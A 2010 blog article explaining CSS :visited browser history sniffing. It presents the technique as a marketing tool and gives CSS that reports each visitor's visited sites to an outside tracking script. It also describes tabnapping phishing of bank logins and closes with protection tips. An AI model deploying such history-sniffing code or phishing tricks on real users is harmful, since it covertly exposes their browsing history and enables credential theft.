Browser Sniffing

05 December 2010

Recently browser sniffing has been massively publicised and there have been some pretty big names doing it - so what exactly are you missing out on? Well imagine a marketing company being able to tailor each advert according to which sites their visitor had visited, that sounds too good to be true right? Wrong! With browser sniffing you can check if any website has been visited - and it isn't difficult either.

What this means is that you can customise parts of your site around what websites you're visitors have visited, for example if you are selling software products you could check to see if you're visitor has been to Microsoft.com, if they have you could show all of the Microsoft products - the possibilities are endless.

So the big question is how? How do the browsers allow you to do this? Basically it's a fundamental flaw in how browsers work - it's surrounding CSS (Cascading Style Sheet). When you click a link it saves a state, this state is called "visited" now whenever that link is called (in another website) it will say that that link has been visited, which means if you have a number of URL's you can tell which ones you have and haven't been too.

Browser sniffing has been reported to all of the major browsers - however there are billions of sites using CSS on their sites, so a change would be difficult to implement - and a change which required people to change their websites would be out of the question. One way to get around this would be to keep the states locally, which means that each state is saved on a per-site basis. This would require a massive change by all of the browsers and it doesn't seem something they are particularly bothered about.

So, how do I do it? Please see the code below.

CSS Style sheet

.Google a:visited {background-image:url('http://www.lexel.co.uk/tracking_script.asp?Ref=Google.com');}
.Facebook a:visited {background-image:url('http://www.lexel.co.uk/tracking_script.asp?Ref=Facebook.com');}

HTML

<a href="http://www.google.com" class="Google">Google</a>
<a href="http://www.facebook.com" class="Facebook">Facebook</a>

Once you've called you're tracking script you could then set a cookie or session.

There is another quite popular technique which is called Tab Napping, the idea of Tab Napping is that when you leave your computer for a period of time a script activates - this script will then redirect you to a website you have recently visited (using the history sniffing technique) and ask you to enter credentials. The idea behind Tab Napping is that it redirects you when you've left to make that quick cup of tea! Once you come back you're faced with an identical page to Halifax or Santander - of course, you would just assume that you've left it open and log in as normal.

You've scared me, how do I protect myself? I would suggest using something like Trusteer Rapport; this will alert you if you enter protected details into another website. Before logging into any secure website, make sure you have the padlock symbol. You can download Rapport from here: http://www.trusteer.com/product/trusteer-rapport

Article Written by Jason Gaved